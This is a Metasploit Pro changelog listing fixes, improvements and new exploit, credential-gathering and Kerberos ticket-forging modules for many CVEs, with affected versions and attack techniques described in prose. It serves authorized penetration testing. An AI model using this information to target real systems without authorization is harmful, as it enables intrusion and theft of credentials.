Metasploit Pro Changelog

What's new in Metasploit Pro 4.22.2 (April 17, 2024)

Apr 17, 2024

Improved:
PR 18906 - Adds support for leveraging the ESC4 attack on misconfigured AD-CS servers to introduce ESC2 and ESC3.
PR 19052 - Updates Metasploit's User Agent strings to values valid for April 2024.
PR 19064 - Adds support to the auxiliary/scanner/snmp/snmp_login module to work over the TCP protocol in addition to UDP.
Fixed:
PR 18935 - Fixes a common user mistake when authenticating with LDAP modules. Now users can specify either the USERNAME (user) and DOMAIN (domain.local) datastore options or the original format of just the USERNAME in the UPN format ([email protected]). This fix updates the LDAP library.
PR 19007 - Fixes a regression that affected exploit/multi/http/log4shell_header_injection module which stopped the module from running successfully.
PR 19021 - Updates the admin/mysql/mysql_enum module to work with newer versions of MySQL.
PR 19056 - Fixes an issue were the socket would be closed if targeting a single host with multiple user_file/pass_file module option combinations. This was caused when a session was successfully opened but then the next login attempt would close the socket being used by the newly created session.
PR 19059 - Fixes an issue with the psnuffle module's POP3 support.
PR 19069 - Fixes an edgecase present in clients that programmatically interacted with Metasploit's remote procedure call (RPC) functionality that caused the login modules for SMB, Postgres, MySQL, and MSSQL to open a new session by default instead of it being opt in behavior.
Modules:
PR 18764 - Adds a new module to exploit CVE-2024-23897, an unauthorized arbitrary (first 2 lines) file read on Jenkins versions prior to 2.442 or for the LTS stream, versions prior to 2.426.3.
PR 18915 - Adds a module for a buffer overflow at the administration interface of WatchGuard Firebox and XTM appliances. The appliances are built from a cherrypy python backend sending XML-RPC requests to a C binary called wgagent using pre-authentication endpoint /agent/login. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2. Successful exploitation results in remote code execution as user nobody.
PR 18962 - Adds a post module to leverage CVE-2023-22649 which is a sensitive information leak in the rancher service's audit logs.
PR 19044 - Adds an exploit module that exploits Gibbon online school platform version 26.0.00 and lower to achieve remote code execution. Note that authentication is required. This leverages a PHP deserialization attack via columnOrder in a POST request (CVE-2024-24725).
PR 19051 - Adds a new module to add to, list, flush and delete from the LDAP msDS-KeyCredentialLink attribute which enables user to execute "shadow credential" attacks for persistence and lateral movement.

New in Metasploit Pro 4.22.2 (February 15, 2024) (Feb 29, 2024)

Improved:
Pro: The create-segmentation-target.sh script has been updated to support modern Debian environments.
Pro: The scan UI has now been updated to work with both Ipv4 and Ipv6 addreses. Previously scans supported only one address type, but now both are supported.
Pro: Updates multiple documentation links to updated locations.
PR 17634 - Reliability and stability notes that have been previously missing have been added to some modules.
PR 17667 - Makes various performance and output readability improvements to Metasploit's password cracking functionality. Hash types without a corresponding hash are skipped, invalid hashes are no longer output, cracking stops for a hash type when there's no more hashes left, empty tables are no longer printed, support for Hashcat username functionality has been added, a quiet option has been added, documentation has been added to the wiki, among other code optimizations.
PR 17689 - Adds an additional column to the creds command to additionally show any cracked passwords that have been created by the auxiliary/analyze/crack_databases module or similar modules.
PR 18218 - This PR reduces the number of requests the Windows checkvm post module sends to the host when attempting to determine what hypervisor the session is running in by saving the initial responses in instance variables for later use in the module. The PR also includes many other general code improvements.
PR 18256 - Performs a routine update of multiple library dependencies.
PR 18296 - Updates multiple MySQL modules to support authenticating with newer versions of MySQL.
PR 18299 - Improves error messages for timeouts when interacting with a Meterpreter session. Before an unclear error was printed. Now the user is notified how to increase the timeout limit.
PR 18364 - Adds support for filtering sessions based on last checkin time, session type, and ID.
PR 18379 - This PR improves the Kerberos service authenticator hostname matching for ccache credentials. Prior to this change the service authenticator was filtering out valid credentials when the hostname wasn't an exact match when credentials for a domain (i.e. windomain.local) should work on a subdomain (i.e. dc.windomain.local).
PR 18383 - This PR adds a variety of improvements to the enum_computers module including Shell and Powershell support as well as improvements when running on non-english systems.
PR 18386 - This PR adds the lmkdir command to Meterpreter, which creates a directory on the local host.
PR 18394 - This PR adds documentation for the auxiliary/scanner/http/http_traversal module.
PR 18421 - This adds the capability to store the TGT ticket in the MSF kerberos cache when a successful Kerberos login is received by the kerberos_login brute force module.
PR 18428 - This PR adds documentation for the mssql_login module.
PR 18441 - Adds at-rest encryption to Meterpreter payloads on the Metasploit host machine's file system.
PR 18446 - This PR makes the DomainControllerRhost option optional, even when the authentication mode is set to Kerberos. It does so by looking up the Kerberos server using the SRV records that Active Directory publishes by default for the specified realm.
PR 18451 - Updates the newly added cracked password column as part of the creds command to work with the remote database.
PR 18463 - This updates the linux/upnp/dlink_upnp_msearch_exec exploit module to be more generic and adds an advanced detection logic (check method). This module leverages a command injection vulnerability that exists in multiple D-Link network products. This allows an attacker to inject arbitrary command to the UPnP via a crafted M-SEARCH packet. This also deprecates the modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi module, which uses the same attack vector and can be replaced by this updated module.
PR 18484 - Updates the multi/manage/shell_to_meterpreter with additional options for overriding the calculated platform and PowerShell arch value, these options can be seen with the advanced options.
PR 18504 - Updates the auxiliary/scanner/http/grafana_plugin_traversal module to include a disclosure date and a link to the original disclosure blog post.
PR 18515 - This PR adds a Java target for the manageengine servicedesk plus exploit for CVE-2022-47966 and deletes the log file that records the error due to the exploit to make it more stealthy.
PR 18548 - Updates the admin/http/tomcat_ghostcat module to follow newer library conventions.
PR 18560 - This updates the existing Kerberos ticket-forging module with new actions for forging tickets with fields copied from ones issued by the legitimate KDC using the Diamond and Sapphire techniques.
PR 18565 - This PR adds an enhancement to adjust the kerberos cache lookup logic. If no TGT for the specific host is found, it will try again but with any host. This fixes the workflow where a user can currently forge a golden ticket, but that ticket will not be automatically used for authentication by other services. This will also fix the future issue of the TGT that's created by the diamond and sapphire techniques.
PR 18571 - Improves the error messages shown to users if there is a validation error with a module's RHOST datastore values. Now the user is notified when there is a failure with parsing a URL, invalid CIDR, or DNS resolution failure.
PR 18580 - Metasploit modules developed using Python can now provide default_options as part of an exploit.
PR 18598 - This PR bumps the metasploit-payload version to bring in one fix and one enhancement. The fix is to standardize the behavior of Java Meterpreter to only listen on IPv4 interfaces when binding to 0.0.0.0. The enhancement is to better align pretty OS names on Windows for Windows Kernel 10 releases, AKA Windows server 2016-present or Windows 10/11+.
PR 18622 - Updates the auxiliary/scanner/dcerpc/petitpotam module to work with newer Windows Server releases.
PR 18623 - This updates the file handling of the generate command's -o parameter to expand file system paths.
PR 18631 - This PR adds an improvement to the check method of the vcenter_java_wrapper_vmon_priv_esc module. Before the module would attempt to see if a file was writable before checking if the file existed on the system. This caused the check method to return an error message along with a the check code. This PR fixes that issue.
PR 18632 - This PR adds improvements to the glibc tunables privilege escalation module. In the event the file command is not present on the target the module will try to use the readelf command in order to get the ld.so build ID to determine whether or not the target is compatible with exploit.
PR 18680 - This adds a service compatible with Rex::ServiceManager for SMB that can be shared among modules.
PR 18691 - Metasploit console now requires an installed version of apktool greater than or equal to v2.9.2.
PR 18720 - This enhancement marks the existing unix encoders as also being compatible with linux. Previously, no encoder modules were marked as compatible with linux, so users could not set bad character when using the new fetch payloads.
PR 18735 - Adds additional module metadata to the exploits/windows/iis/iis_webdav_scstoragepathfromurl module.
PR 18737 - This updates metasploit-payloads gem to 2.0.165 to pull in changes to support direct syscalls for Meterpreter on Windows. See this PR and this PR for details.
PR 18742 - Enhances the post/multi/gather/memory_search with additional UX improvements such as outputting a list of matched processes that are being targeted, as well as improved error handling if the process architecture is not correct.
PR 18747 - Updates the auxiliary/scanner/mssql/mssql_login module with a new CreateSession option which controls the opening of an interactive MSSQL session. This functionality is currently behind a feature flag which can be enabled with features set mssql_session_type true.
PR 18761 - Adds a user notification that new modules support a CreateSession option. This functionality is currently behind a feature flag which can be enables with the features command.
PR 18806 - Improves unknown command handling by suggesting similar valid commands.
PR 18825 - Improves the error messages when the current session is not compatible with a post module.
Payload Enhancements:
PR 18355 - This PR contains a metasploit-payloads fix which enables the Java Meterpreter to run on the latest OpenJDK. Prior to this change the Java Meterpreter was broken due to changes in JDK 9's reflection policy. The new approach avoids the use of problematic URLClassLoaders and implements Metasploit's own ClassLoader type.
Fixed:
PR 18400 - This fixes an issue when searching for a Kerberos ticket and passing in the workspace. The workspace is now correctly used to query the database.
PR 18403 - Fixes a potential bug with modules that register files to cleanup after a session opens. Previously modules could accidentally mutate registered file names to delete, causing the intended files to be left on the remote system.
PR 18411 - Fixes an edge-case where the services -R command generated invalid hosts such as 192.0.2.2% if an empty string was registered for the scope metadata instead of nil.
PR 18431 - Updates the order in which the lhost and lport are displayed to the user in the portfwd command
PR 18443 - Adds a fix for the handler/reverse_ssh module that was returning warnings when msfconsole was booted on a Windows machine.
PR 18448 - Fixes and updates the auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass module to use renamed NEW_USERNAME and NEW_PASSWORD options.
PR 18449 - Fixes an issue with the scanner/mysql/mysql_authbypass_hashdump module to now correctly close sockets.
PR 18506 - This PR fixes a stability issue with the f5_bigip_tmui_rce_cve_2023_46747 module. Prior to this fix, occasionally the module would fail on login as things were running too quickly, the module now retries logging in if the first attempt fails.
PR 18532 - Fix db2 scanner module crashes.
PR 18547 - This fixes an issue in the platform detection used by the SSH login modules that was causing certain Windows environments to be incorrectly fingerprinted.
PR 18558 - Fixes a crash in the post/windows/gather/enum_chrome module which can be used to decrypt passwords stored by the user in Chrome.
PR 18564 - Fixes a module crash when running the auxiliary/server/capture/http module.
PR 18579 - This converts the module to use the new style of Windows version detection that was added in https://github.com/rapid7/metasploit-framework/pull/17336. This will become more important once the Windows Meterpreter returns a more accurate string for the sysinfo OS field.
PR 18603 - Updates the auxiliary/scanner/snmp/snmp_enum and auxiliary/scanner/snmp/snmp_login module metadata to include metadata references to CVE-1999-0516 (guessable SNMP community string) and CVE-1999-0517 (default/null/missing SNMP community string).
PR 18606 - rpc_plugin has been updated to correctly use the provided plugin options.
PR 18609 - This fixes an issue in the cmd/windows/powershell/download_exec payload module that was preventing it from executing correctly due to an architecture check.
PR 18613 - Ensures that after listing files within an SMB directory that the handle is closed.
PR 18614 - Fixes a crash in the auxiliary/scanner/ssh/ssh_identify_pubkeys module, as well as adding new module documentation.
PR 18655 - Fix added for when the hierarchical search functionality is enabled, and only one module result is found - the module will automatically be used.
PR 18667 - Re-adds the #sysinfo instance method for sessions.
PR 18673 - Fix spelling mistakes in Metasploit's scripts folder.
PR 18690 - Ensures that a target's default payload is correctly chosen when selecting a module from the search command.
PR 18710 - Fixes an uninitialized constant Msf::Simple::Exploit::ExploitDriver exception that could sometimes occur when running Metasploit framework's payload modules.
PR 18712 - Fixes a crash with Metasploit's REST api when calling /api/v1/modules?name=aux.
PR 18746 - Fixes a module bug when using the generate OPTION=VALUE syntax. Previously the module's datastore would be unintentionally updated with the new option value.
PR 18750 - Updates the to_handler command for payload modules to support option overrides. The to_handler command is a convenient way of using multi/handler, setting the payload, and setting datastore options.
PR 18760 - Fixes an issue where Metasploit fails to start when resolv.conf cannot be found.
PR 18774 - Updates the following modules to now work with newer versions of sqlcmd, post/windows/gather/credentials/mssql_local_hashdump and post/windows/manage/mssql_local_auth_bypass.
PR 18798 - This fixes an issue in the exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move module's check method that was causing version comparisons to fail.
PR 18799 - This fixes an issue in the exploit/windows/local/cve_2020_17136 module's check method that was causing version comparisons to fail.
PR 18800 - This fixes an issue in the exploit/windows/local/cve_2021_40449 module's check method that was causing version comparisons to fail.
PR 18801 - This fixes an issue in the exploit/windows/local/cve_2022_26904_superprofile module's check method that was causing version comparisons to fail.
PR 18803 - Fixes a crash when using exploit/multi/handler with an invalid payload name.
PR 18812 - Reverts the auxiliary/scanner/mssql/mssql_login modules's TDSENCRYPTION default value to false.
PR 18813 - Fixes a crash when running the help services or help hosts commands.
PR 18823 - Fix module metadata platform list comparison.
PR 18826 - Fixes a regression where the windows/smb/psexec module was not correctly performing cleanup logic.
Modules:
PR 18194 - This adds a post module that creates a new user on the target OS. It tries to use standard tools already available on the system, but it's also able to directly updates the plaintext database files (/etc/passwd and `/etc/shadow). This module requires root privileges.
PR 18348 - This module exploits an authorization vulnerability in Splunk, targeting CVE-2023-32707, allowing a lower privileged user with the capability edit_user to take over the admin account and log in to upload a malicious app, achieving remote code execution.
PR 18351 - This adds an exploit for CVE-2023-37941 which is an authenticated RCE in Apache Superset.
PR 18404 - This adds an exploit for CVE-2023-38146 AKA ThemeBleed which is a TOCTOU issue in the way Windows handles theme files. The vulnerability can be leveraged to load a payload DLL from Metasploit to execute code within the context of the user who loads it. A legitimate signed theme DLL must be provided in order to use the exploit.
PR 18417 - Kibana before version 7.6.3 suffers from a prototype pollution bug within the Upgrade Assistant. By setting a new constructor.prototype.sourceURL value we're able to execute arbitrary code in the context of the Kibana user. There is no CVE for this at the moment.
PR 18427 - This PR adds a module that exploits PyTorch TorchServer by chaining an SSRF vulnerability with a deserialization RCE vulnerability to permit an unauthenticated remote attacker arbitrary Java code execution. The PR also fixes how the ClassLoader mixin handles datastore options.
PR 18434 - This PR adds an exploit module for an unauthenticated remote code execution vulnerability in the video surveillance software Zoneminder (CVE-2023-26035).
PR 18447 - This adds an exploit for CVE-2023-22515 which is an authentication bypass within Atlassian Confluence that enables a remote attacker to create a new administrator account.
PR 18460 - This adds a new exploit module that leverages the fact that SSH keys on VMWare Aria Operations for Networks (vRealize Network Insight) versions 6.0.0 through 6.10.0 are not randomized on initialization. It tries all the default SSH keys until one succeed and gain unauthorized remote access as the "support" (root) user.
PR 18461 - This adds an exploit module that leverages an improper input validation issue in Atlassian Confluence versions between 8.0.0 through to 8.3.2, 8.4.0 through to 8.4.2, and 8.5.0 through to 8.5.1. This vulnerability is identified as CVE-2023-22515 and allows unauthenticated remote code execution. The module first creates a new administrator by abusing the embedded XWorks2 middleware and uploading a malicious plugin to get code execution. Note that the module is currently not able to delete the new administrator account it created. This would require a manual clean up.
PR 18481 - This adds an exploit module that leverages a command injection vulnerability in MagnusBilling versions 6 and 7. this vulnerability is identified as CVE-2023-30258 and allows unauthenticated remote code execution in the context of the user running the web server process.
PR 18488 - This PR adds a module to manage Kerberos tickets from a compromised host. This notably allows Kerberos tickets to be exported from the target and then added to Metasploit's own cache, allowing them to be used for the duration in which they are valid.
PR 18492 - This adds a scanner module for exploiting CVE-2023-4966 which is a memory leak in Citrix ADC servers. This vulnerability allows a remote, unauthenticated attacker to leak memory by sending a very large HTTP Host header. The leaked memory is then scanned for session cookies which can be hijacked if found.
PR 18494 - This PR adds an RCE module for AjaxPro which leverages an insecure deserialization of data to get remote code execution on the target OS in the context of the user running the website which utilized AjaxPro.
PR 18497 - This module exploits a flaw in F5s BIG-IP Traffic Management User Interface (TMUI) that enables an external, unauthenticated attacker to create an administrative user. The attacker can then use the admin user to execute arbitrary code in the context of the root user.
PR 18501 - This pull request is an exploit module for CVE-2023-46604, affecting the OpenWire transport unmarshaller in Apache ActiveMQ.
PR 18503 - This PR adds a post module to steal config and credential information for Apache NiFi.
PR 18507 - This PR adds three modules: auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 leverages CVE-2023-20198 to perform unauthenticated remote CLI command execution, module auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273 leverages bothCVE-2023-20198 and CVE-2023-20273 to perform unauthenticated remote OS command execution, and exploit/linux/misc/cisco_ios_xe_rce uses the same two vulnerabilities to run an arbitrary payload on the target.
PR 18541 - This adds an exploit module for the "Looney Tunables" Linux LPE, identified as CVE-2023-4911. It checks the version of glibc running on the target to make sure it is vulnerable and, once verified, it drops a python script that exploits the vulnerability and returns a session running in the context of the root user.
PR 18542 - This adds an exploit module fora command injection vulnerability in Vinchin Backup & Recovery versions v5.0, v6.0, v6.7, and v7.0. This leverages two vulnerabilities identified as CVE-2023-45499 and CVE-2023-45498.
PR 18566 - This adds an exploit module for CVE-2023-22518, an Improper Authorization vulnerability in Confluence which allows an attacker to upload and restore a .zip backup file to the server containing a known user name and password. The attacker can then login with the credentials from the backup file to gain administrative access to the server.
PR 18567 - This pull request adds a new exploit module for, CVE-2023-5360, an unauth file upload vulnerability in the WordPress Royal Elementor Addons and Templates plugin in versions before 1.3.79.
PR 18568 - This PR adds a module leveraging CVE-2023-32781, an authenticated command injection vulnerability in PRTG versions 23.2.84.1566 and earlier.The result is command execution as SYSTEM.
PR 18569 - This adds a module to gather credential material from accounts with "Requires Pre-Authentication" disabled. The module supports two mechanisms, brute forcing using a list of usernames or using a LDAP query to request the relevant usernames, followed by requesting TGTs.
PR 18577 - This PR adds a Remote Code Execution (RCE) module for Splunk Enterprise using CVE-2023-46214. This module exploits a vulnerability in the XSLT transformation functionality of certain versions of Splunk Enterprise, allowing for authenticated remote code execution.
PR 18578 - This PR adds a new module to exploit CVE-2022-0492, a docker escape for root on the host OS.
PR 18591 - This PR adds an auxiliary module for CVE-2023-49103 which can extract sensitive environment variables from ownCloud targets including ownCloud, DB, Redis, SMTP and S3 credentials.
PR 18604 - This pull request introduces a new post module to extracts Mikrotik Winbox credentials saved in the "settings.cfg.viw" file when the "Keep Password" option is selected in Winbox.
PR 18612 - This adds an exploit module that leverages a remote code execution vulnerability in CraftCMS versions between 4.0.0-RC1 and 4.4.14. This vulnerability is identified as CVE-2023-41892 and allows an unauthenticated attacker to execute arbitrary code remotely.
PR 18626 - This PR adds an exploit module which allows for a user who has compromised a host acting as a SaltStack Master to deploy payloads to the Minions attached to that Master.
PR 18627 - This adds 3post exploitation modules for Ansible. The first one gathers information and configuration. The second exploits an arbitrary file read that enables an attacker to read the first line of a file (tipicaly /etc/shadow), when the compromised account is configured with password-less sudo permissions. The last one is an exploit that can deploy a payload to all the nodes in the network.
PR 18628 - This PR adds a post gather module to get Puppet configs and other sensitive files.
PR 18630 - This adds an exploit for a command injection vulnerability in MajorDoMo versions before 0662e5e.
PR 18633 - This adds an exploit module that leverages an unauthenticated RCE in the WordPress plugin Backup Migration versions prior to 1.3.7. This vulnerability is identified as CVE-2023-6553. This also adds a library that implements a technique called PHP Filter Chaining which allows an attacker to prepend bytes to a string by continuously chaining character encoding conversion.
PR 18635 - This PR adds a module for an authenticated Splunk information disclosure vulnerability. This module gathers information about the host machine and the Splunk install including OS version, build, CPU arch, Splunk license keys etc.
PR 18638 - Adds an exploit module for CVE-2022-42889 that targets web apps utilising Apache Commons Text's (1.5-1.9) StringSubstitutor interpolator class in an insecure fashion.
PR 18648 - This PR adds an exploit module for a number of different GL.iNet network products. The module combines an authentication by-pass vulnerability (CVE-2023-50919) with an RCE (CVE-2023-50445) allowing the user to remotely obtain, without authentication, a Meterpreter session running in the context of the root user.
PR 18664 - This adds an SMB fetch-payload service and a new payload to use it. The payload invokes rundll32 but handles everything for the user automatically.
PR 18708 - This PR adds an exploit chain that consists of two vulnerabilities, an authentication bypass (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887). The exploit chain allows a remote unauthenticated attacker to execute arbitrary OS commands with root privileges. As per the Ivanti advisory, these vulnerabilities affect all supported versions of the products, versions 9.x and 22.x. It is unknown if the unsupported versions 8.x and older are also affected.
PR 18713 - Adds a new multi/gather/memory_search module that can read memory of processes on Windows and Linux hosts with Meterpreter. Regular expressions can be used to find passwords/credentials, and glob patterns and PIDs can be used to identify target processes.
PR 18734 - This adds an exploit for CVE-2023-22527 which is an unauthenticated RCE in Atlassian Confluence. The vulnerability is due to an SSTI flaw that allows an OGNL expression to be evaluated. The result is OS command execution in the context of the service account.
PR 18755 - This PR adds an exploit module for Mirth Connect. Versions < 4.4.1 are vulnerable to CVE-2023-43208 and CVE-2023-37679 and where the former is a patch bypass for the later. In both cases, an attacker can execute an OS command in the context of the target service using a specially crafted HTTP request and Java deserialization gadget.
PR 18762 - This pull request adds an exploit module for CVE-2024-0204 which is a path traversal vulnerability which results in unauthenticated RCE in Fortra GoAnywhere MFT. GoAnywhere MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable.
PR 18769 - This PR adds an exploit module which leverages a SQLi (CVE-2023-49085) and a LFI (CVE-2023-49084) vulnerability in Cacti versions prior to 1.2.26 to achieve RCE.
PR 18780 - This adds a local privilege escalation exploit that leverages an internal file descriptor leak in runc versions prior to 1.1.12. An attacker with docker privileges is able write an arbitrary file on the host file system with the permissions of runc (typically root). With this, the module uploads a payload, sets the execute and the SUID permissions to escalate privileges.
PR 18807 - This adds a new encoder module that leverages base64 encoding to escape bad characters in ARCH_CMD payloads for the Linux and UNIX platforms.

New in Metasploit Pro 4.22.2 (September 29, 2023) (Oct 4, 2023)

Improved:
Adds support to the Capcom.sys driver LPE for Windows 11 21H1.
Improves the Windows checkvm post module by adding new techniques to identify the hypervisor in which the session is running.
PR 18190 - Improves the Linux checkvm post module by adding new techniques to identify the hypervisor in which the session is running.
PR 18191 - Adds support for detecting whether a Metasploit session is running in a Podman container and improves detection for sessions running in Docker, LXC and WLS containers.
PR 18214 - Makes two improvements to the fetch payloads. The first improvement is that the FETCH_SRVHOST option will be set to LHOST when LHOST is set and FETCH_SRVHOST is not. That means there is one less option users need to set when using a payload with a reverse stager. The second improvement is that the default command for the Windows HTTP payload has been changed to CERTUTIL which will offer better compatibility with older versions of Windows than the previous CURL command. The HTTPS and TFTP payloads will still default to CURL.
Adds index selection for the modules returned via the favorites (or show favorites) command.
Adds tests to ensure the consistency of Metasploit payloads.
Adds ability to select favorite modules with the use command after running show favorites, similar to the search command.
Improves tab completion for the set and unset commands.
Updates CVE-2020-14871 exploits/solaris/ssh/pam_username_bof docs.
Updates all PostgreSQL modules to now support a newer form of authentication (SASL-SCRAM-256) that pentesters are now more frequently seeing in the wild. This includes the modules for PostgreSQL authentication brute force, version fingerprinting, running queries, etc.
Adds stability enhancements to Meterpreter payloads. Additionally, this adds a large suite of automated sanity tests to Github Actions that verify OSX/Windows/Linux/Python/Java/PHP Meterpreter payloads work.
Improves error messages when failing to interact with a network interface such as calling set LHOST=.
Fixes documentation typos with the exploit/multi/http/subrion_cms_file_upload_rce module.
Improves the readability of documentation/modules/exploit/windows/http/smartermail_rce.
Updates the ldap_query module to stream the results instead of collecting them all at once, improving the user experience when using the module in large target environments with thousands of accounts.
Updates the Elasticsearch auxiliary module. It has been renamed to elastic_enum, accepts credentials, and will store data to disk that is pulled from the target.
Fixes an issue where specifying a TLS version in the ssl_version module would result in a NoMethodError.
Adds a new ThriftClient class for interacting with Thrift RPC services. It also updates the two existing Metasploit modules to use it.
Updates the search command with additional the search keywords stage: :stager: and adapter:.
Fixes a bug in 7 modules that specified the RelatedModules metadata incorrectly. Now, the RelatedModules data is correctly shown to the user when running the info command.
Adds a check to the smtp_relay auxiliary/scanner/smtp/smtp_relay scanner module to confirm if the EHLO command is supported by the server. If not, the module will try to initiate the session using the HELO command instead.
Fixes multiple spelling mistakes in module documentation.
Fixed
Fixed an error in nessus_db_import and nessus_scan_export commands that prevented them from completing successfully.
Adds additional error handling when loading Metasploit payloads to msfconsole's startup process to ensure missing payloads do not crash msfconsole
Adds a fix to verify the EC2_ID module option is validated.
Fixes an issue in the exploit module multi/http/adobe_coldfusion_rce_cve_2023_26360 when the target ColdFusion server is deployed with a Development profile.
Updates the module metadata for the Java reverse_http and reverse_https stagers to be treated as a dynamic payload size, instead of a static/fixed size. This size change can happen as the Java payload contains a user-configurable HTTP callback URL, and combined with the Zip compression present in JAR files - the overall generated payload size can change as a result.
Fixes a crash when running the auxiliary/scanner/mysql/mysql_login module against newer versions of MySQL.
Fixes a stack trace thrown by the forge_ticket module when the SPN datastore option was left blank. The module now fails due to bad-config and gives a detailed error message.
Fixes a typo in the exploit/freebsd/http/citrix_formssso_target_rce docs.
Fixes the broken scanner/mysql/mysql_authbypass_hashdump module and adds documentation for the module.
Changes the behavior of setting LHOST as an interface name, for example with set LHOST eth0. Previously, a non-deterministic IP would be resolved from the adapter name if the adapter had multiple IPv4/IPv6 addresses registered. Now, the lowest ordinal IPv4 addresses are preferenced, followed by any IPv6 addresses.
Fixes a crash when parsing ThriftHeader binary data.
Updates the admin/kerberos/forge_ticket module to work with newer Windows Server releases, in particular post Windows Server October 2022. Now when forging Golden tickets, the forged PAC contains a PAC requestor element with the forged user SID, and additional PAC attributes.
Fixes an issue which could have caused a new msfrpc console instance to hang forever.
Fixes a crash with OptAddressLocal that was caused by darwin AF_LINK having an empty string for its addr.
Fixes an issue where msfrpc would hang when updating saved command history.
Modules
Adds a module that chains together a log poisoning LFI, redirection bypass and a path traversal vulnerability to obtain unauthenticated RCE.
Adds two modules for targeting vulnerabilities related to the signing of Flask's session cookies. One of them exploits a vulnerability in Apache Superset which is identified as CVE-2023-27524.
Adds a module for an unauthenticated RCE against Metabase. Metabase versions before 0.46.6.1has a bug where an unauthenticated user can retrieve a setup-token. With this, they can query an API endpoint to setup a new database, then inject an H2 connection string RCE.
Adds an exploit module that leverages an unauthenticated remote command execution vulnerability Chamilo versions 1.11.18 and below. This vulnerability is identified as CVE-2023-34960. Due to a functionality called Chamilo Rapid to easily convert PowerPoint slides to courses on Chamilo, it is possible for an unauthenticated remote attacker to execute arbitrary commands at OS level using a malicious SOAP request at the vulnerable endpoint /main/webservices/additional_webservices.php.
Adds an exploit module that leverages an authentication bypass and an arbitrary file upload in Netgear ProSAFE NMS300. These vulnerabilities have been identified as CVE-2023-38096 and CVE-2023-38098 respectively and affects versions below 1.7.0.22. By chaining together these vulnerabilities, an unauthenticated remote attacker can execute arbitrary code with SYSTEM privileges.
Adds a new privilege escalation module that exploits a vulnerable clfs.sys driver on Windows to spawn a new NT AUTHORITY/SYSTEM Meterpreter session. The vulnerable driver comes installed by default on Windows 10 21H2, Windows 11 21H2 and Windows Server 2022 (Build 20348) operating systems.
Adds a file-format exploit affecting Greenshot versions 1.3.274 and earlier, including the last stable release, 1.2.10.6.
Adds an exploit module for a Apache NiFi h2 remote code execution identified as CVE-2023-34468. Versions 0.0.2 through 1.21.0 are vulnerable and allow an authenticated and authorized user to configure a Database URL with the H2 driver that enables custom code execution. This also adds a library with helper functions for modules targeting this product.
Adds an unauthenticated command injection module for the RaspAP webgui application.
Updates the exploits/freebsd/http/citrix_formssso_target_rce module for CVE-2023-3519 to include two new targets, Citrix ADC (NetScaler) 12.1-65.25, and 12.1-64.17. This module now supports automatic targeting based on the Last-Modified header of the logon/fonts/citrix-fonts.css resource.
Adds an exploit for VMware vRealize Log Insight versions prior to 8.10.2. It chains multiple vulnerabilities (CVE-2022-31706, CVE-2022-31704, CVE-2022-31711) together to achieve unauthenticated RCE.
Adds a module for an unauthenticated RCE vulnerability in Maltrail, a malicious traffic detection system. The module author indicated that this vulnerability does not have a CVE associated with it as the vendor (product team in this case) declined to assign one.
Adds a module that detects Windows hosts that are vulnerable to https://github.com/advisories/GHSA-xvhr-xr27-hpmq aka QueueJumper.
Exploits an unauthenticated command injection vulnerability by combining two critical vulnerabilities in Apache Airflow 1.10.10. The first, CVE-2020-11978, is an authenticated command injection vulnerability found in one of Airflow's example DAGs, example_trigger_target_dag, which allows any authenticated user to run arbitrary OS commands as the user running Airflow Worker/Scheduler. The second, CVE-2020-13927, is a default setting of Airflow 1.10.10 that allows unauthenticated access to Airflow's Experimental REST API to perform malicious actions such as creating the vulnerable DAG above.
Adds a module to retrieve and arbitrary file on hosts running Roundcube versions from 1.1.0 through version 1.3.2.
Creates two modules: one to interrogate Prometheus API endpoints for information, the other to query Prometheus Node Exporters for information. This is supported by a new Prometheus library and specs.
This adds an exploit module that leverages a remote code execution in SonicWall GMS. Version 9.3.9320 (and likely earlier) is affected by this vulnerability identified as CVE-2023-34124.
Adds a module which exploits a vulnerability that allows remote code execution on a vulnerable SolarView Compact device by bypassing internal restrictions through the vulnerable endpoint downloader.php using the file parameter. Firmware versions up to v6.33 are vulnerable.
Adds an exploit module that leverages a directory traversal vulnerability in Windows 10. This vulnerability is identified as CVE-2023-36874 and enables an attacker to elevate privileges to those of the NT AUTHORITYSYSTEM user. Note that this module works with Windows 10x64 22H2.
Adds a module that exploits a prototype pollution vulnerability in the Kibana Timelion visualiser resulting in Remote Code Execution.
Adds an exploit module that targetsIvanti Avalanche MDM versions before v6.4.1, leveraging a buffer overflow condition.
Adds an aux scanner module which exploits a memory disclosure vulnerability within Elasticsearch 7.10.0 to 7.13.3 (inclusive) by submitting a malformed query that generates an error message containing previously used portions of a data buffer. The disclosed memory could contain sensitive information such as Elasticsearch documents or authentication details.
This module exploits broken access control and directory traversal vulnerabilities for achieving unauthenticated remote code execution on the LG Simple Editor versions <= v3.21. Module achieves code execution in the context of NT AUTHORITYSYSTEM via uploading and executing a JSP payload.
Adds an exploit module that targets Ivanti Sentry (formerly Mobileiron Sentry) which is vulnerable to an authentication by-pass which exposes API functionality, allowing for code execution in the context of the root user.
Adds an exploit module that leverages an unauthenticated remote code execution vulnerability in certain Lexmark devices through 2023-02-19. This vulnerability (CVE-2023-26068) is only exposed if, when setting up the printer or device, the user selects "Set up Later" when asked if they would like to add an Admin user.
Adds a module covering CVE-2023-38831, a fileformat vulnerability affecting Winrar 6.22.
Adds a new module that exploits an unauthenticated command injection vulnerability in OpenTSDB through 2.4.1 resulting in root access.
Adds an exploit module that leverages a command insertion vulnerability in TOTOLINK X5000R Wireless Gigabit Router firmware X5000R_V9.1.0u.6118_B20201102. This allows remote code execution as the user running the webserver, typically as the root user.
Adds an unauthenticated RCE for JetBrain's TeamCity server on both Linux and Windows. A remote attacker can exploit an authentication bypass vulnerability and then execute OS commands in the context of the service.

New in Metasploit Pro 4.22.2 (July 31, 2023) (Aug 3, 2023)

New in Metasploit Pro 4.22.1 (July 6, 2023) (Jul 6, 2023)

New in Metasploit Pro 4.22.1 (June 23, 2023) (Jun 26, 2023)

Improved:
Pro: We added support for adhoc Nexpose/InsightVM connection dialogs to be submitted upon completion using the Enter key and improved the error reporting for this dialog.
This PR adds new code to simplify and standardize windows version checking and comparisons.
